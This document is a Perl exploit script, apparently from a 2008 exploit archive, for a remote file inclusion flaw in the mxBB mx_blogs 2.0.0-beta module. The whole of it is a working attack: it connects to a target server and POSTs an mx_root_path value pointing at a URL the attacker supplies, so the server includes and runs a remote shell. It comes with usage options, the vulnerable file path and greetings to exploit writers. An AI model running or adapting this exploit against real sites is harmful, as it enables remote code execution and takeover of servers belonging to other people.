mxbbmxblogs-rfi.txt
Posted on 01 April 2008
# mxBB Module mx_blogs 2.0.0-beta Remote File Include Exploit # # Vendor: http://www.mx-system.com # # Download: http://www.mx-system.com/index.php?page=4&action=file&file_id=405 # # Vulncode in: /includes/functions_weblog.php line 24 # # Greetz: str0ke, TheJT, rgod, Vallani, DNX, NBBN use Getopt::Long; use URI::Escape; use IO::Socket; $shellcode = "Insert the url to shell here"; main(); sub usage { print "mxBB Module mx_blogs 2.0.0-beta Remote File Include Expl "; print "by bd0rk <www.soh-crew.it.tt> "; print "-t, --ttarget (someone.com) "; print "-f, --tshell (url to your shellcode) "; print "-d, --dir (/mx_blogs) "; exit; } sub main { GetOptions ('t|target=s' => $target,'f|shell=s' => $shell,'d|dir=s' => $dir); usage() unless $target; $shellcode = $shell unless !$shell; $url = uri_escape($shellcode); $sock = IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>"$target",PeerPort=>"80") or die " Connection() failed. "; print " Connected to ".$target.", injecting shellcode. "; $sendurl = "mx_root_path=".$url.""; $sendlen = length($sendurl); print $sock "POST ".$dir."/includes/functions_weblog.php? HTTP/1.1 "; print $sock "Host: ".$target." "; print $sock "Connection: close "; print $sock "Content-Type: application/x-www-form-urlencoded "; print $sock "Content-Length: ".$sendlen." "; print $sock $sendurl; print "Attempted to include shellcode, Response: "; while($recvd = <$sock>) { print " ".$recvd.""; } exit; }
